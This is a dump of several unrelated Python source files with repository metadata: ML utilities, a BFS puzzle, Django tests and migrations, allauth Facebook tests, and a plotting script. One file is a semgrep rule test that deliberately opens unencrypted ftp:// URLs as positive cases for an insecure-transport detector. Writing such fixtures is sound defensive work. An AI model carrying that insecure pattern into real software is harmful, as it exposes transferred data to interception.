leonkozlowski@gmail.com
|
97f69ec49c421509df9b9ef2b9c6785bdb0dafc5
|
9ee327caec1165ff7c70ddb2d792388e5b6be3b5
|
/src/utils.py
|
3f6760f2bbaa8f8ed1b93a1ca48119143e7a1ec2
|
[] |
no_license
|
nicktao9/AgriculturalDiseaseClassification
|
62a0f5c1b8301c431e6c4435abcb4dda0897210b
|
f505aad04b7d421bbb2d2c91f75e02813a2f8dc7
|
refs/heads/master
| 2020-04-06T18:00:42.357728
| 2018-11-15T09:28:42
| 2018-11-15T09:28:42
| 157,681,631
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,289
|
py
|
import sys, os, time
import visdom
import time,glob
import numpy as np
import cv2,json,shutil
import logging
from tqdm import tqdm
""" Create a new dir """
def create_folder(fd):
if not os.path.exists(fd):
os.makedirs(fd)
""" Visuallizer Module """
class Visualizer(object):
"""
封装了visdom的基本操作,但是你仍然可以通过`self.vis.function`
调用原生的visdom接口
"""
def __init__(self, env='default', **kwargs):
self.vis = visdom.Visdom(env=env, **kwargs)
# 画的第几个数,相当于横座标
# 保存(’loss',23) 即loss的第23个点
self.index = {}
self.log_text = ''
def reinit(self, env='default', **kwargs):
"""
修改visdom的配置
"""
self.vis = visdom.Visdom(env=env, **kwargs)
return self
def plot_many(self, d):
"""
一次plot多个
@params d: dict (name,value) i.e. ('loss',0.11)
"""
for k, v in d.items():
self.plot(k, v)
def img_many(self, d):
for k, v in d.items():
self.img(k, v)
def plot(self, name, y, **kwargs):
"""
self.plot('loss',1.00)
"""
x = self.index.get(name, 0)
self.vis.line(Y=np.array([y]), X=np.array([x]),
win=name,
opts=dict(title=name),
update=None if x == 0 else 'append',
**kwargs
)
self.index[name] = x + 1
def img(self, name, img_, **kwargs):
"""
self.img('input_img',t.Tensor(64,64))
self.img('input_imgs',t.Tensor(3,64,64))
self.img('input_imgs',t.Tensor(100,1,64,64))
self.img('input_imgs',t.Tensor(100,3,64,64),nrows=10)
!!!don‘t ~~self.img('input_imgs',t.Tensor(100,64,64),nrows=10)~~!!!
"""
self.vis.images(img_.cpu().numpy(),
win=name,
opts=dict(title=name),
**kwargs
)
def log(self, info, win='log_text'):
"""
self.log({'loss':1,'lr':0.0001})
"""
self.log_text += ('[{time}] {info} <br>'.format(
time=time.strftime('%m%d_%H%M%S'),
info=info))
self.vis.text(self.log_text, win)
def __getattr__(self, name):
return getattr(self.vis, name)
""" log module """
class log(object):
"""
记录日志
log = log()
log.printf("This is a good start {}".format(1))
"""
def __init__(self,
level = logging.DEBUG,
format1 = '%(asctime)s %(filename)s : %(levelname)s %(message)s',
datefmt = '%Y-%m-%d %A %H:%M:%S',
filename = os.path.join("../Result/","log.txt"),
filemode = 'w'):
logging.basicConfig(
level= level, # 定义输出到文件的log级别,大于此级别的都被输出
format= format1, # 定义输出log的格式
datefmt= datefmt, # 时间
filename= filename, # log文件名
filemode=filemode) # 写入模式“w”或“a”
def printf(self,str):
logging.info(str)
def img2classfication(input_json_path,input_file_path,outputs_folders_path):
"""put the picture of json file in the folders of corresponding label
Args:
input_json_path :origion json path
input_file_path :all images folder
outputs_folders_path:outputs path of file
Returns:
different label folders in outputs_folders_path
"""
with open(input_json_path,'r') as f:
data_dict = json.load(f)
with tqdm(total = len(data_dict),unit= 'pic') as pbar:
for data in data_dict:
data_name = data['image_id']
data_label = data['disease_class']
create_folder(outputs_folders_path +"/"+str(data_label))
shutil.copy(input_file_path + "/" + data_name,outputs_folders_path + "/" + str(data_label) +"/" + data_name)
pbar.update(1)
if __name__ == "__main__":
img2classfication("../../datasets/ai_challenge/val_set/val_annotations.json","../../datasets/ai_challenge/val_set/images/","../../datasets/ai_challenge/new_val_set/")
|
[
"taolianjie007@163.com"
] |
taolianjie007@163.com
|
60c9db8974c4fcdaf3f0fc22cf0b0a1ad6083ca1
|
5095a2cbc3fea5b63b6f3cabf4ae1bd930cdb479
|
/영동/16_숨바꼭질.py
|
68332c98c92b749a3fb174e52d26d5d881b07e15
|
[] |
no_license
|
syeeuns/week03
|
a198150d94caf772d6421b4adf6d8e28793853db
|
cf40b994fa285800854bac07b7ef86ad5dbdf35a
|
refs/heads/master
| 2023-02-06T13:13:11.012967
| 2020-12-31T04:14:10
| 2020-12-31T04:14:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 438
|
py
|
from collections import deque
N,K = map(int, input().split())
Max=10**5+1
queue=deque([N])
D=[[-1]*2 for _ in range(Max)]
D[N][0]=0
T=[K]
z=K
while queue:
v = queue.popleft()
for newv in [v-1,v+1,v*2]:
if 0<= newv < Max and D[newv][0]==-1:
queue.append(newv)
D[newv][0]=D[v][0]+1
D[newv][1]=v
while D[z][1]!=-1:
T.append(D[z][1])
z=D[z][1]
print(D[K][0])
print(*reversed(T))
|
[
"zeroistfilm@naver.com"
] |
zeroistfilm@naver.com
|
43d4d44a3129344e934b24556ad12f994123e98b
|
114b2f71e553abc33f7774de00391488c74b1563
|
/websocket/tests.py
|
e6715e95a399eef9667284201cceb8de914e38ce
|
[] |
no_license
|
279zlj/Autotest_project
|
06589305df696b21e05a4f521a56c8170ec7b327
|
60576bfe56d9a4e76a590bfa3176e196d06dbeed
|
refs/heads/master
| 2022-12-14T03:42:49.933047
| 2018-08-28T03:15:53
| 2018-08-28T03:15:53
| 146,384,029
| 0
| 0
| null | 2022-12-08T02:23:10
| 2018-08-28T03:00:05
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,608
|
py
|
from django.test import TestCase
from client.c_client import Client
# Create your tests here.
import json
import sqlite3
import time
# def save_data(data_response):
# con = sqlite3.connect("D:\Autotestproject\Autotest_project\db.sqlite3")
# cur = con.cursor()
# cur.execute('insert into \
# auto_config_infos \
# (server_num,board,cpu,fc_card,gpu,hard_disk,hba,inspect_time,memory_bank,net_card,raid,status,vga) \
# values\
# ({},{},{},{},{},{},{},{},{},{},{},{},{})'.format(data_response["server_num"], data_response["board"],
# data_response["cpu"], data_response["fc_card"],
# data_response["gpu"], data_response["hard_disk"],
# data_response["hba"], data_response["inspect_time"],
# data_response["memory_bank"], data_response["net_card"], data_response["raid"],
# data_response["status"], data_response["vga"]))
# cur.execute('select * from auto_config_infos')
# print(cur.fetchall())
# con.commit()
# cur.close()
# d = {"raid": "", "fc_card": "", "status": 1, "checkstate": 0, "server_num": "23dfgtr", "ip_info": "127.0.0.1",
# "state": "success", "cpu": "CpuNum:1/CpuCore:4/CpuInfo:8Intel(R)Xeon(R)CPUE3-1230v3@3.30GHz",
# "inspect_time": 1534484708.3386865, "vga": "Graphics:LeadTekResearchInc.GK107[GeForceGT640][107d:2737]\r\n",
# "memory_bank": "MemInfo:*ASRock*Intel*Transcend/MemSize:4096MB/MemFreq:1600MT/s", "gpu": "", "hba": "",
# "hard_disk": "DiskInfo:WDCWD10EURX-73C/DiskNum:1/DiskVer:/01.01A01",
# "net_card": "NetBoardInfo:IntelCorporationEthernetConnection(2)I218-V",
# "board": "BoardName:Z97Pro3/BisoVersion:P1.20"}
d = {"board": "BoardName:Z97Pro3/BisoVersion:P1.20", "hba": "",
"net_card": "NetBoardInfo:IntelCorporationEthernetConnection(2)I218-V", "raid": "dash_raid",
"vga": "Graphics:LeadTekResearchInc.GK107[GeForceGT640][107d:2737]\r\n", "ip_info": "127.0.0.1", "checkstate": 0,
"memory_bank": "MemInfo:*ASRock*Intel*Transcend/MemSize:4096MB/MemFreq:1600MT/s", "state": "success",
"hard_disk": "DiskInfo:WDCWD10EURX-73C/DiskNum:1/DiskVer:/01.01A01",
"cpu": "CpuNum:1/CpuCore:4/CpuInfo:8Intel(R)Xeon(R)CPUE3-1230v3@3.30GHz", "gpu": "", "status": 1,
"inspect_time": 1534486359.491127, "server_num": "23dfgtr", "fc_card": ""}
def save_data(data_response):
print(data_response)
con = sqlite3.connect("D:\Autotestproject\Autotest_project\db.sqlite3")
cur = con.cursor()
params = [data_response["server_num"], data_response["board"], data_response["cpu"], data_response["memory_bank"],
data_response["hard_disk"], data_response["raid"], data_response["vga"], data_response["gpu"],
data_response["hba"], data_response["net_card"], data_response["fc_card"], data_response["inspect_time"],
data_response["ip_info"], data_response["checkstate"], data_response["state"], data_response["status"]]
cur.execute('insert into auto_config_infos \
(server_num,board,cpu,memory_bank,hard_disk,raid,vga,gpu,hba,net_card,fc_card,inspect_time,ip_info,checkstate,state,status) \
values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', params)
con.commit()
cur.execute('select * from auto_config_infos')
cur.close()
save_data(d)
|
[
"13414101644@163.com"
] |
13414101644@163.com
|
dab6144f837dc47e6411c03a43353b5968913916
|
8659a70b1a210bc0c8eceac7fb6152e42ebec8a2
|
/ch4/bmi/13-bmi-plot.py
|
19d7c858cfdb98a99c331833e33afb18885b6a0f
|
[] |
no_license
|
boossiman2/Python_web
|
49482575a54fc89b430891140bb48245a62af9e4
|
50b40cacff3613c3b413bd25de23ea8be3a70b7e
|
refs/heads/master
| 2018-11-08T03:30:13.606773
| 2018-08-28T12:33:49
| 2018-08-28T12:33:49
| 41,590,382
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import matplotlib.pyplot as plt
import pandas as pd
# Pandas로 CSV 파일 읽어 들이기
tbl = pd.read_csv("bmi.csv", index_col=2)
# 그래프 그리기 시작
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
#서브 플롯 전용 - 지정한 레이블을 임의의 색으로 칠하기
def scatter(lbl, color):
b = tbl.loc[lbl]
ax.scatter(b["weight"],b["height"], c=color, label=lbl)
scatter("fat", "red")
scatter("normal", "yellow")
scatter("thin", "purple")
ax.legend()
plt.savefig("bmi-test.png")
#plt.show()
|
[
"boossiman2@gmail.com"
] |
boossiman2@gmail.com
|
178b53756b1a7f1ccec51c10e04445888b4f6264
|
6f8e52d3c03d7a4c82a01dbaaca96719d8ad356f
|
/reader/migrations/0002_article_publish_date.py
|
41d8ce661d41cc22b036839a5db6864080b75c60
|
[] |
no_license
|
maest/chwlang
|
5df4c624e4c703192fdea8b03d1448a959d12368
|
72a81a0aba80af6362fe78dcd37ba972e150bf8f
|
refs/heads/master
| 2022-12-16T22:45:40.865007
| 2019-02-25T19:12:07
| 2019-02-25T19:12:07
| 199,169,668
| 0
| 0
| null | 2022-12-08T01:04:54
| 2019-07-27T13:40:39
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 379
|
py
|
# Generated by Django 2.0.2 on 2018-04-15 18:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reader', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='article',
name='publish_date',
field=models.DateTimeField(null=True),
),
]
|
[
"b.panait@gmail.com"
] |
b.panait@gmail.com
|
2358001a8b8e2de4a23fb90ca93ca55a3ac626f2
|
a2a9260526e0c2a20cb08bcad693d8bddb47d420
|
/lib/python2.7/site-packages/allauth/socialaccount/providers/facebook/tests.py
|
854d1c9745eeae47e94d54a3ac1351b41485b93a
|
[] |
no_license
|
shubh3794/Processing-Payment
|
42df51fb0e582d573fbfd030125f27b8c4464263
|
81c0223889a450f4d023d91eb2890e385afd198b
|
refs/heads/master
| 2021-01-10T03:50:38.727002
| 2015-11-25T20:56:41
| 2015-11-25T20:56:41
| 46,883,262
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,194
|
py
|
import json
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.test.client import RequestFactory
from allauth.socialaccount.tests import create_oauth2_tests
from allauth.tests import MockedResponse, patch
from allauth.socialaccount.models import SocialAccount
from allauth.socialaccount import providers
from allauth.socialaccount.providers import registry
from allauth.account import app_settings as account_settings
from allauth.account.models import EmailAddress
from allauth.utils import get_user_model
from .provider import FacebookProvider
@override_settings(
SOCIALACCOUNT_AUTO_SIGNUP=True,
ACCOUNT_SIGNUP_FORM_CLASS=None,
LOGIN_REDIRECT_URL='/accounts/profile/',
ACCOUNT_EMAIL_VERIFICATION=account_settings
.EmailVerificationMethod.NONE,
SOCIALACCOUNT_PROVIDERS={
'facebook': {
'AUTH_PARAMS': {},
'VERIFIED_EMAIL': False}})
class FacebookTests(create_oauth2_tests(registry.by_id(FacebookProvider.id))):
facebook_data = """
{
"id": "630595557",
"name": "Raymond Penners",
"first_name": "Raymond",
"last_name": "Penners",
"email": "raymond.penners@gmail.com",
"link": "https://www.facebook.com/raymond.penners",
"username": "raymond.penners",
"birthday": "07/17/1973",
"work": [
{
"employer": {
"id": "204953799537777",
"name": "IntenCT"
}
}
],
"timezone": 1,
"locale": "nl_NL",
"verified": true,
"updated_time": "2012-11-30T20:40:33+0000"
}"""
def get_mocked_response(self, data=None):
if data is None:
data = self.facebook_data
return MockedResponse(200, data)
def test_username_conflict(self):
User = get_user_model()
User.objects.create(username='raymond.penners')
self.login(self.get_mocked_response())
socialaccount = SocialAccount.objects.get(uid='630595557')
self.assertEqual(socialaccount.user.username, 'raymond')
def test_username_based_on_provider(self):
self.login(self.get_mocked_response())
socialaccount = SocialAccount.objects.get(uid='630595557')
self.assertEqual(socialaccount.user.username, 'raymond.penners')
def test_username_based_on_provider_with_simple_name(self):
data = '{"id": "1234567", "name": "Harvey McGillicuddy"}'
self.login(self.get_mocked_response(data=data))
socialaccount = SocialAccount.objects.get(uid='1234567')
self.assertEqual(socialaccount.user.username, 'harvey')
def test_media_js(self):
provider = providers.registry.by_id(FacebookProvider.id)
request = RequestFactory().get(reverse('account_login'))
request.session = {}
script = provider.media_js(request)
self.assertTrue('"appId": "app123id"' in script)
def test_login_by_token(self):
resp = self.client.get(reverse('account_login'))
with patch('allauth.socialaccount.providers.facebook.views'
'.requests') as requests_mock:
mocks = [self.get_mocked_response().json()]
requests_mock.get.return_value.json \
= lambda: mocks.pop()
resp = self.client.post(reverse('facebook_login_by_token'),
data={'access_token': 'dummy'})
self.assertRedirects(resp, 'http://testserver/accounts/profile/',
fetch_redirect_response=False)
@override_settings(
SOCIALACCOUNT_PROVIDERS={
'facebook': {
'AUTH_PARAMS': {'auth_type': 'reauthenticate'},
'VERIFIED_EMAIL': False}})
def test_login_by_token_reauthenticate(self):
resp = self.client.get(reverse('account_login'))
nonce = json.loads(resp.context['fb_data'])['loginOptions']['auth_nonce']
with patch('allauth.socialaccount.providers.facebook.views'
'.requests') as requests_mock:
mocks = [self.get_mocked_response().json(),
{'auth_nonce': nonce}]
requests_mock.get.return_value.json \
= lambda: mocks.pop()
resp = self.client.post(reverse('facebook_login_by_token'),
data={'access_token': 'dummy'})
self.assertRedirects(resp, 'http://testserver/accounts/profile/',
fetch_redirect_response=False)
@override_settings(
SOCIALACCOUNT_PROVIDERS={
'facebook': {
'VERIFIED_EMAIL': True}})
def test_login_verified(self):
emailaddress = self._login_verified()
self.assertTrue(emailaddress.verified)
def test_login_unverified(self):
emailaddress = self._login_verified()
self.assertFalse(emailaddress.verified)
def _login_verified(self):
resp = self.login(self.get_mocked_response())
return EmailAddress.objects.get(email='raymond.penners@gmail.com')
|
[
"shubh.aggarwal.37@gmail.com"
] |
shubh.aggarwal.37@gmail.com
|
51ef9ebcaa98ebc7587f1a24b2cf0e33fca79a0f
|
127ed1ba90dcced8cce8366a5139973f1d21c372
|
/python/lang/security/audit/insecure-transport/urllib/insecure-urlopener-open-ftp.py
|
edb25f3b511977c953c437733a648bdd97fd483d
|
[] |
no_license
|
Silentsoul04/semgrep-rules-1
|
f0c53e04b4239555a688bca687340af4736d2514
|
81b81481c0a81e45d3ffba8d60dd98491a1b0446
|
refs/heads/master
| 2022-12-22T15:41:34.399652
| 2020-09-13T14:59:38
| 2020-09-13T14:59:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,388
|
py
|
from urllib.request import URLopener
def test1():
od = URLopener()
# ruleid: insecure-urlopener-open-ftp
od.open("ftp://example.com")
def test1_ok():
od = URLopener()
# ok: insecure-urlopener-open-ftp
od.open("ftps://example.com")
def test2():
od = URLopener()
# ruleid: insecure-urlopener-open-ftp
url = "ftp://example.com"
od.open(url)
def test2_ok():
od = URLopener()
# ok: insecure-urlopener-open-ftp
url = "ftps://example.com"
od.open(url)
def test3():
# ruleid: insecure-urlopener-open-ftp
URLopener().open("ftp://example.com")
def test3_ok():
# ok: insecure-urlopener-open-ftp
URLopener().open("ftps://example.com")
def test4():
# ruleid: insecure-urlopener-open-ftp
url = "ftp://example.com"
URLopener().open(url)
def test4_ok():
# ok: insecure-urlopener-open-ftp
url = "ftps://example.com"
URLopener().open(url)
def test5(url = "ftp://example.com"):
# ruleid: insecure-urlopener-open-ftp
URLopener().open(url)
def test5_ok(url = "ftps://example.com"):
# ok: insecure-urlopener-open-ftp
URLopener().open(url)
def test6(url = "ftp://example.com"):
od = URLopener()
# ruleid: insecure-urlopener-open-ftp
od.open(url)
def test6_ok(url = "ftps://example.com"):
od = URLopener()
# ok: insecure-urlopener-open-ftp
od.open(url)
|
[
"manhnguyen510@gmail.com"
] |
manhnguyen510@gmail.com
|
4c5c34eeb833bb131f5c7d69cd376b51d860a327
|
5c760034921788b8d9e92a9c78f210127e4a6f56
|
/computeDiseaseVec.py
|
1e20bc183c04d65bdf8f75c316df7b041cd6a76d
|
[] |
no_license
|
DiliSimon/HopHacks19
|
80c6d1a99aa3586a94f5087aa46c0f2beb72ee5d
|
afd1579e3f4fde8a3abd468f97af67b99588e8bb
|
refs/heads/master
| 2021-02-10T23:36:00.186011
| 2020-03-02T17:22:01
| 2020-03-02T17:22:01
| 244,429,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
from defaultlist import defaultlist
dlist = []
with open('disease_list') as f:
for l in f:
dlist.append(l.strip('\n'))
dNum = defaultlist(int)
with open('disease_vector.csv') as f:
for l in f:
dname = l.split('[')[0][:-1]
indexOfDisease = dlist.index(dname)
dNum[indexOfDisease] += 1
dveclist = defaultlist(list)
with open('disease_vector.csv') as f:
for l in f:
dname = l.split('[')[0][:-1]
indexOfDisease = dlist.index(dname)
dveclist[indexOfDisease] = defaultlist(int)
scorelist = l.split('[')[1].split(',')
for ind in range(len(scorelist)):
if ind == len(scorelist)-1:
scorelist[ind]=scorelist[ind][:-2]
if not int(scorelist[ind]) == 0:
dveclist[indexOfDisease][ind] += 1/dNum[indexOfDisease]
print(dveclist)
for ind in range(len(dveclist)):
if dveclist[ind] == []:
print(ind)
|
[
"Gtingwen@outlook.com"
] |
Gtingwen@outlook.com
|
8f3fd56d7fcc53dff4b0a0f3e9943652e4108514
|
9e70af68afebb05e66381e4f6a978eb1b7589c46
|
/mywork/testsurface.py
|
9c9f460c955f27a1e39564e43c413a7f23928d5c
|
[] |
no_license
|
OuYangMinOa/space-Physic
|
cbca14b3948ac204c35327fbb9cc6ab9eb704d76
|
e8e6ec7379a8cecb944add6dbbbee213dae1b018
|
refs/heads/master
| 2022-11-11T08:09:59.844261
| 2020-06-28T20:14:24
| 2020-06-28T20:14:24
| 275,657,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 745
|
py
|
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import numpy as np
from netCDF4 import Dataset
import os
m = Basemap()
m.drawcoastlines()
m.fillcontinents()
m.drawparallels(np.arange(-90,90,30),labels=[1,1,0,1], fontsize=8)
m.drawmeridians(np.arange(0,360,30),labels=[1,1,0,1], rotation=45, fontsize=8)
plt.xlabel('Longitude', labelpad=40)
plt.ylabel('Latitude', labelpad=40)
x = np.arange(-90,90,1)
y = np.arange(-180,180,1)
x,y = np.meshgrid(x,y)
z = np.sin(x/100)**10 + np.cos(10 + y*x/10000) * np.cos(x/100)
##mappable = plt.cm.ScalarMappable(cmap=plt.cm.viridis)
##mappable.set_array(z)
print(z.shape)
m.pcolormesh(y,x,z,zorder=2,cmap='Spectral_r',alpha=0.7)
plt.colorbar()
plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
4a47b93956005fbcfc0bdd1b548ae397f80962e4
|
ac255a4ddae0644b7599531b69d5cd34c855358c
|
/yt-corey-schafer/2-strings.py
|
193a1f3e3c2c590b987bf78bde4c03a746338470
|
[] |
no_license
|
mickosav/python
|
23bc992a83324395f88b8e6a6cf7d6a9f42c9f1e
|
16c381c9edcdcb29f835d02eac8e15d84c186fa9
|
refs/heads/master
| 2020-08-25T09:09:33.938495
| 2020-03-10T12:21:06
| 2020-03-10T12:21:06
| 216,989,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 870
|
py
|
message = 'Hello Micko'
message_multiline = '''bla bla blalalll
hello lsakdjfl '''
print(message)
print(message_multiline)
print(len(message)) # length
print(type(message)) # -> <class 'str'>
print(message[0])
# slicing:
print(message[0:5]) # from (including) - to (excluding)
print(message[:5]) # from start
print(message[6:]) # from 6 to the end
# string methods
print(message.lower())
print(message.upper())
print(message.count('Micko'))
print(message.find('Hello'))
print(message.find('asdfasdfasdf')) # -> -1
message_pera = message.replace('Micko', 'Pera') # replace doesn't mutate state - it returnes new string
print(message_pera)
# concatenation
gretting = 'Hello'
name = 'Mickon'
print(gretting + ', ' + name + '. Welcome!')
print('{}, {}. Welcome!'.format(gretting, name))
# f-strings (available from v3.6)
print(f'{gretting}, {name.upper()}. Welcome!')
|
[
"mickosavovic@gmail.com"
] |
mickosavovic@gmail.com
|
cde76863a99e655e46b43112532dd7da3bcc13d4
|
1bde0c807f17fc431b04b4b9cb338ee3acd34b7d
|
/.history/predict_20210713124241.py
|
7c01488a87ec48a2cd94cb2965aba58fb29d0d56
|
[] |
no_license
|
Harrysibbenga/Pytorch-NLP
|
cf9d7e6376d5e19929e6703c3342c81c1a128be1
|
6f22f6ac5f2bf37f27ed2d6285f3a154eda4b566
|
refs/heads/main
| 2023-06-19T22:43:35.513874
| 2021-07-14T19:45:15
| 2021-07-14T19:45:15
| 385,595,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 822
|
py
|
from model import *
from data import *
import sys
rnn = torch.load('char-rnn-classification.pt')
# Just return an output given a line
def evaluate(line_tensor):
hidden = rnn.initHidden()
for i in range(line_tensor.size()[0]):
output, hidden = rnn(line_tensor[i], hidden)
return output
def predict(line, n_predictions=3):
output = evaluate(Variable(lineToTensor(line)))
# Get top N categories
topv, topi = output.data.topk(n_predictions, 1, True)
predictions = []
for i in range(n_predictions):
value = topv[0][i]
category_index = topi[0][i]
print('(%.2f) %s' % (value, all_categories[category_index]))
predictions.append([value, all_categories[category_index]])
return predictions
if __name__ == '__main__':
predict(sys.argv[1])
|
[
"sibbengaharry@gmail.com"
] |
sibbengaharry@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.